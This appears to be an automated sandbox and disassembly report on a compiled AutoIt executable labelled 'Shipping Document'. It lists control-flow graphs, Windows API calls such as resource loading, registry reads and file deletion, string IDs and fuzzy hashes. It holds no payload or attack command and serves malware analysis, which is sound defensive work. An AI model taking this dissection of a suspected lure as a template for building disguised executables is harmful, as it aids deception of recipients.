                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                              • String ID: This is a third-party compiled AutoIt script.$runas
                              • API String ID: 529118366-3287110873
                              • Opcode ID: 0ed03059059fac33b4e593818302c1cf2af566627f5acb9653029af85070a276
                              • Instruction ID: bc157560dc4d123a0d0a8fd6b19aeb3fc07a287762ce6852034977e1933a8623
                              • Opcode Fuzzy Hash: 0ed03059059fac33b4e593818302c1cf2af566627f5acb9653029af85070a276
                              • Instruction Fuzzy Hash: FF510331D0824AAACB21FBB4DE46FFD7B75AF04350F0480ADF8D1A6152CA3E5645EB20

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 996 fc4afe-fc4b5e call fc77c7 GetVersionExW call fc7d2c 1001 fc4c69-fc4c6b 996->1001 1002 fc4b64 996->1002 1003 ffdb90-ffdb9c 1001->1003 1004 fc4b67-fc4b6c 1002->1004 1005 ffdb9d-ffdba1 1003->1005 1006 fc4c70-fc4c71 1004->1006 1007 fc4b72 1004->1007 1009 ffdba4-ffdbb0 1005->1009 1010 ffdba3 1005->1010 1008 fc4b73-fc4baa call fc7e8c call fc7886 1006->1008 1007->1008 1018 ffdc8d-ffdc90 1008->1018 1019 fc4bb0-fc4bb1 1008->1019 1009->1005 1012 ffdbb2-ffdbb7 1009->1012 1010->1009 1012->1004 1014 ffdbbd-ffdbc4 1012->1014 1014->1003 1016 ffdbc6 1014->1016 1020 ffdbcb-ffdbce 1016->1020 1021 ffdca9-ffdcad 1018->1021 1022 ffdc92 1018->1022 1019->1020 1023 fc4bb7-fc4bc2 1019->1023 1024 ffdbd4-ffdbf2 1020->1024 1025 fc4bf1-fc4c08 GetCurrentProcess IsWow64Process 1020->1025 1026 ffdcaf-ffdcb8 1021->1026 1027 ffdc98-ffdca1 1021->1027 1030 ffdc95 1022->1030 1031 fc4bc8-fc4bca 1023->1031 1032 ffdc13-ffdc19 1023->1032 1024->1025 1033 ffdbf8-ffdbfe 1024->1033 1028 fc4c0d-fc4c1e 1025->1028 1029 fc4c0a 1025->1029 1026->1030 1036 ffdcba-ffdcbd 1026->1036 1027->1021 1037 fc4c89-fc4c93 GetSystemInfo 1028->1037 1038 fc4c20-fc4c30 call fc4c95 1028->1038 1029->1028 1030->1027 1039 ffdc2e-ffdc3a 1031->1039 1040 fc4bd0-fc4bd3 1031->1040 1034 ffdc1b-ffdc1e 1032->1034 1035 ffdc23-ffdc29 1032->1035 1041 ffdc08-ffdc0e 1033->1041 1042 ffdc00-ffdc03 1033->1042 1034->1025 1035->1025 1036->1027 1045 fc4c56-fc4c66 1037->1045 1053 fc4c7d-fc4c87 GetSystemInfo 1038->1053 1054 fc4c32-fc4c3f call fc4c95 1038->1054 1046 ffdc3c-ffdc3f 1039->1046 1047 ffdc44-ffdc4a 1039->1047 1043 ffdc5a-ffdc5d 1040->1043 1044 fc4bd9-fc4be8 1040->1044 1041->1025 1042->1025 1043->1025 1052 ffdc63-ffdc78 1043->1052 1049 ffdc4f-ffdc55 1044->1049 1050 fc4bee 1044->1050 1046->1025 1047->1025 1049->1025 1050->1025 1055 ffdc7a-ffdc7d 1052->1055 1056 ffdc82-ffdc88 1052->1056 1057 fc4c47-fc4c4b 1053->1057 1061 fc4c76-fc4c7b 1054->1061 1062 fc4c41-fc4c45 GetNativeSystemInfo 1054->1062 1055->1025 1056->1025 1057->1045 1060 fc4c4d-fc4c50 FreeLibrary 1057->1060 1060->1045 1061->1062 1062->1057
                              APIs
                              • GetVersionExW.KERNEL32(?), ref: 00FC4B2B
                                • Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66
                              • GetCurrentProcess.KERNEL32(?,0104FAEC,00000000,00000000,?), ref: 00FC4BF8
                              • IsWow64Process.KERNEL32(00000000), ref: 00FC4BFF
                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00FC4C45
                              • FreeLibrary.KERNEL32(00000000), ref: 00FC4C50
                              • GetSystemInfo.KERNEL32(00000000), ref: 00FC4C81
                              • GetSystemInfo.KERNEL32(00000000), ref: 00FC4C8D
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                              • String ID:
                              • API String ID: 1986165174-0
                              • Opcode ID: a65a3b13a3dbbaab7824930e92f236dfbb8606c474916286577876200463027e
                              • Instruction ID: bf6889d59080bda2aa1f81334a1a8f983f71157eb3dc3eeba0aa663616d95f32
                              • Opcode Fuzzy Hash: a65a3b13a3dbbaab7824930e92f236dfbb8606c474916286577876200463027e
                              • Instruction Fuzzy Hash: 2591273184A7C5DEC731DB788662BAAFFE5AF66310B044D9DD0CB83A51C224F908E719

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1063 fc4fe9-fc5001 CreateStreamOnHGlobal 1064 fc5021-fc5026 1063->1064 1065 fc5003-fc501a FindResourceExW 1063->1065 1066 ffdd5c-ffdd6b LoadResource 1065->1066 1067 fc5020 1065->1067 1066->1067 1068 ffdd71-ffdd7f SizeofResource 1066->1068 1067->1064 1068->1067 1069 ffdd85-ffdd90 LockResource 1068->1069 1069->1067 1070 ffdd96-ffdd9e 1069->1070 1071 ffdda2-ffddb4 1070->1071 1071->1067
                              APIs
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00FC4EEE,?,?,00000000,00000000), ref: 00FC4FF9
                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FC4EEE,?,?,00000000,00000000), ref: 00FC5010
                              • LoadResource.KERNEL32(?,00000000,?,?,00FC4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00FC4F8F), ref: 00FFDD60
                              • SizeofResource.KERNEL32(?,00000000,?,?,00FC4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00FC4F8F), ref: 00FFDD75
                              • LockResource.KERNEL32(00FC4EEE,?,?,00FC4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00FC4F8F,00000000), ref: 00FFDD88
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                              • String ID: SCRIPT
                              • API String ID: 3051347437-3967369404
                              • Opcode ID: 6779b655990172ff1f2f1e9a98cd23781cfb98c4692745edf319806a189221e0
                              • Instruction ID: 453c4b1d4e3757597a0bd7a9ba6dd2ce37bf8838bf497287b15bdac9ce4476a7
                              • Opcode Fuzzy Hash: 6779b655990172ff1f2f1e9a98cd23781cfb98c4692745edf319806a189221e0
                              • Instruction Fuzzy Hash: C6119EB5640702BFD7308B29DE89F277BB9EBC9B51F10416CF445C6250DB62E8409660
                              APIs
                              • GetFileAttributesW.KERNELBASE(?,00FFE7C1), ref: 010246A6
                              • FindFirstFileW.KERNELBASE(?,?), ref: 010246B7
                              • FindClose.KERNEL32(00000000), ref: 010246C7
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: FileFind$AttributesCloseFirst
                              • String ID:
                              • API String ID: 48322524-0
                              • Opcode ID: 98f695f24a7162bf5592fda5b50f996975b82b070988eab912f594d882d43c4c
                              • Instruction ID: 37b3ec92f0c7a9fb64fec5ccdcdbfaab8485a39dea77a20cd78a3c3be65af292
                              • Opcode Fuzzy Hash: 98f695f24a7162bf5592fda5b50f996975b82b070988eab912f594d882d43c4c
                              • Instruction Fuzzy Hash: 16E0D875910411DB4231663CED8D4EA779C9E09235F000746F9B5C10D0EBB459508696
                              Strings
                              • Variable must be of type 'Object'., xrefs: 0100428C
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID: Variable must be of type 'Object'.
                              • API String ID: 0-109567571
                              • Opcode ID: 467f14efbf92e41d8071beedd7e1f1721ce2e6721018a57720e34c9240f8d2e2
                              • Instruction ID: 5297ed4cb34d90b38388de7a2cd839747039477521cac9ddf7be36d49587ccc5
                              • Opcode Fuzzy Hash: 467f14efbf92e41d8071beedd7e1f1721ce2e6721018a57720e34c9240f8d2e2
                              • Instruction Fuzzy Hash: D4A27A75E00206CFDB24CF58C682FADB7B2BB48310F24806DE956AB355D735AC46EB91
                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD0BBB
                              • timeGetTime.WINMM ref: 00FD0E76
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD0FB3
                              • TranslateMessage.USER32(?), ref: 00FD0FC7
                              • DispatchMessageW.USER32(?), ref: 00FD0FD5
                              • Sleep.KERNEL32(0000000A), ref: 00FD0FDF
                              • LockWindowUpdate.USER32(00000000,?,?), ref: 00FD105A
                              • DestroyWindow.USER32 ref: 00FD1066
                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FD1080
                              • Sleep.KERNEL32(0000000A,?,?), ref: 010052AD
                              • TranslateMessage.USER32(?), ref: 0100608A
                              • DispatchMessageW.USER32(?), ref: 01006098
                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 010060AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                              • API String ID: 4003667617-3242690629
                              • Opcode ID: 190871ea8fe5f6b621699f143824d00d82be28f5416dcbf57537e23949820efd
                              • Instruction ID: 8b04431ff4398230f04665b2b3875a3a2e1a2cdb1515d251b7b6e5a7ada5dd0a
                              • Opcode Fuzzy Hash: 190871ea8fe5f6b621699f143824d00d82be28f5416dcbf57537e23949820efd
                              • Instruction Fuzzy Hash: 61B2B070608342DFE725DB24C885BAEBBE5BF84304F18495EE5C987291DB79E844DF82

                              Control-flow Graph

                              APIs
                                • Part of subcall function 010291E9: __time64.LIBCMT ref: 010291F3
                                • Part of subcall function 00FC5045: _fseek.LIBCMT ref: 00FC505D
                              • __wsplitpath.LIBCMT ref: 010294BE
                                • Part of subcall function 00FE432E: __wsplitpath_helper.LIBCMT ref: 00FE436E
                              • _wcscpy.LIBCMT ref: 010294D1
                              • _wcscat.LIBCMT ref: 010294E4
                              • __wsplitpath.LIBCMT ref: 01029509
                              • _wcscat.LIBCMT ref: 0102951F
                              • _wcscat.LIBCMT ref: 01029532
                                • Part of subcall function 0102922F: _memmove.LIBCMT ref: 01029268
                                • Part of subcall function 0102922F: _memmove.LIBCMT ref: 01029277
                              • _wcscmp.LIBCMT ref: 01029479
                                • Part of subcall function 010299BE: _wcscmp.LIBCMT ref: 01029AAE
                                • Part of subcall function 010299BE: _wcscmp.LIBCMT ref: 01029AC1
                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 010296DC
                              • _wcsncpy.LIBCMT ref: 0102974F
                              • DeleteFileW.KERNEL32(?,?), ref: 01029785
                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0102979B
                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 010297AC
                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 010297BE
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                              • String ID:
                              • API String ID: 1500180987-0
                              • Opcode ID: f32fc087fca53760cdc42979dfc2716ed81c835a421eeba86b638767bf522c5d
                              • Instruction ID: b8e90ea47ff0496a2bf5425723b75d4fc1dc49c3c4f714dde03f48f4eca41ad6
                              • Opcode Fuzzy Hash: f32fc087fca53760cdc42979dfc2716ed81c835a421eeba86b638767bf522c5d
                              • Instruction Fuzzy Hash: 2AC15DB1E0022AABCF21DF95CD85EDEB7BCEF44304F0040AAE649E7141DB359A848F65

                              Control-flow Graph

                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 00FC3074
                              • RegisterClassExW.USER32(00000030), ref: 00FC309E
                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FC30AF
                              • InitCommonControlsEx.COMCTL32(?), ref: 00FC30CC
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FC30DC
                              • LoadIconW.USER32(000000A9), ref: 00FC30F2
                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FC3101
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                              • API String ID: 2914291525-1005189915
                              • Opcode ID: 8a27e20540b7131c8287b2abc19cace4abe5b7bd4df7980aab1279f42a57b817
                              • Instruction ID: 695f17142e0a1e6b64fc7be33f82380ae43c24dd97ade277a3552591a2e83e0a
                              • Opcode Fuzzy Hash: 8a27e20540b7131c8287b2abc19cace4abe5b7bd4df7980aab1279f42a57b817
                              • Instruction Fuzzy Hash: 4E3147B585430AEFDB20DFA8D989ACDBBF0FB09310F15426AE5D0E6284D3BA4585CF51

                              Control-flow Graph

                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 00FC3074
                              • RegisterClassExW.USER32(00000030), ref: 00FC309E
                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FC30AF
                              • InitCommonControlsEx.COMCTL32(?), ref: 00FC30CC
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FC30DC
                              • LoadIconW.USER32(000000A9), ref: 00FC30F2
                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FC3101
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                              • API String ID: 2914291525-1005189915
                              • Opcode ID: b285edccb5b4f0d2f341bfa5233c8fc22144fa6698f60ced5f9272cefc06cadf
                              • Instruction ID: 6d8b39a90248ac08144463e153dd49d5553cc1a1e3346973c19726ff9e3a23f2
                              • Opcode Fuzzy Hash: b285edccb5b4f0d2f341bfa5233c8fc22144fa6698f60ced5f9272cefc06cadf
                              • Instruction Fuzzy Hash: 3E2115F5914209EFDB20DFA8E988B8DBBF4FB08700F00421AF994E6284D7BB05448F91

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00FC4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010862F8,?,00FC37C0,?), ref: 00FC4882
                                • Part of subcall function 00FE074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00FC72C5), ref: 00FE0771
                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FC7308
                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FFECF1
                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FFED32
                              • RegCloseKey.ADVAPI32(?), ref: 00FFED70
                              • _wcscat.LIBCMT ref: 00FFEDC9
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                              • API String ID: 2673923337-2727554177
                              • Opcode ID: 8ece6e7c935bf6e32f7f5f42d4fb9f881b4dc90ea670b28a1a545745220d9280
                              • Instruction ID: 3ddc24607fafa7327b665c54c71b2f05123a0ad348ca36ddea72f4145ced300d
                              • Opcode Fuzzy Hash: 8ece6e7c935bf6e32f7f5f42d4fb9f881b4dc90ea670b28a1a545745220d9280
                              • Instruction Fuzzy Hash: 7A718C714083069EC324EF25ED829AFBBE8FF84750F50442EF5C587168EB3A9948DB52

                              Control-flow Graph

                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 00FC3A62
                              • LoadCursorW.USER32(00000000,00007F00), ref: 00FC3A71
                              • LoadIconW.USER32(00000063), ref: 00FC3A88
                              • LoadIconW.USER32(000000A4), ref: 00FC3A9A
                              • LoadIconW.USER32(000000A2), ref: 00FC3AAC
                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FC3AD2
                              • RegisterClassExW.USER32(?), ref: 00FC3B28
                                • Part of subcall function 00FC3041: GetSysColorBrush.USER32(0000000F), ref: 00FC3074
                                • Part of subcall function 00FC3041: RegisterClassExW.USER32(00000030), ref: 00FC309E
                                • Part of subcall function 00FC3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FC30AF
                                • Part of subcall function 00FC3041: InitCommonControlsEx.COMCTL32(?), ref: 00FC30CC
                                • Part of subcall function 00FC3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FC30DC
                                • Part of subcall function 00FC3041: LoadIconW.USER32(000000A9), ref: 00FC30F2
                                • Part of subcall function 00FC3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FC3101
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                              • String ID: #$0$AutoIt v3
                              • API String ID: 423443420-4155596026
                              • Opcode ID: ae247be6ec55a72f8f53348ebbfe315be81a057ccf0b3053a9d73e5a245f56b2
                              • Instruction ID: 550980d93bf49826335b1a934824ba6877e06b94d8f141326e04c16ebeb47cc8
                              • Opcode Fuzzy Hash: ae247be6ec55a72f8f53348ebbfe315be81a057ccf0b3053a9d73e5a245f56b2
                              • Instruction Fuzzy Hash: E5216DB5D04305AFEB20DFA8E949B9D7BB4FB08710F014199F580AA294C3BF55549F80

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 767 fc3633-fc3681 769 fc36e1-fc36e3 767->769 770 fc3683-fc3686 767->770 769->770 771 fc36e5 769->771 772 fc3688-fc368f 770->772 773 fc36e7 770->773 776 fc36ca-fc36d2 DefWindowProcW 771->776 774 fc375d-fc3765 PostQuitMessage 772->774 775 fc3695-fc369a 772->775 777 fc36ed-fc36f0 773->777 778 ffd31c-ffd34a call fd11d0 call fd11f3 773->778 783 fc3711-fc3713 774->783 779 ffd38f-ffd3a3 call 1022a16 775->779 780 fc36a0-fc36a2 775->780 782 fc36d8-fc36de 776->782 784 fc3715-fc373c SetTimer RegisterWindowMessageW 777->784 785 fc36f2-fc36f3 777->785 812 ffd34f-ffd356 778->812 779->783 803 ffd3a9 779->803 786 fc36a8-fc36ad 780->786 787 fc3767-fc3776 call fc4531 780->787 783->782 784->783 788 fc373e-fc3749 CreatePopupMenu 784->788 791 ffd2bf-ffd2c2 785->791 792 fc36f9-fc370c KillTimer call fc44cb call fc3114 785->792 793 ffd374-ffd37b 786->793 794 fc36b3-fc36b8 786->794 787->783 788->783 798 ffd2f8-ffd317 MoveWindow 791->798 799 ffd2c4-ffd2c6 791->799 792->783 793->776 809 ffd381-ffd38a call 101817e 793->809 801 fc36be-fc36c4 794->801 802 fc374b-fc375b call fc45df 794->802 798->783 806 ffd2c8-ffd2cb 799->806 807 ffd2e7-ffd2f3 SetFocus 799->807 801->776 801->812 802->783 803->776 806->801 813 ffd2d1-ffd2e2 call fd11d0 806->813 807->783 809->776 812->776 817 ffd35c-ffd36f call fc44cb call fc43db 812->817 813->783 817->776
                              APIs
                              • DefWindowProcW.USER32(?,?,?,?), ref: 00FC36D2
                              • KillTimer.USER32(?,00000001), ref: 00FC36FC
                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FC371F
                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FC372A
                              • CreatePopupMenu.USER32 ref: 00FC373E
                              • PostQuitMessage.USER32(00000000), ref: 00FC375F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                              • String ID: TaskbarCreated
                              • API String ID: 129472671-2362178303
                              • Opcode ID: 45b6d7d708c5d502dd9899b82c489eb0771d8099f8e59c56387f9bac9699dc03
                              • Instruction ID: cb74036093f0342933421f5538f685afba281c9a84cf58eb8cfd9794ee107e12
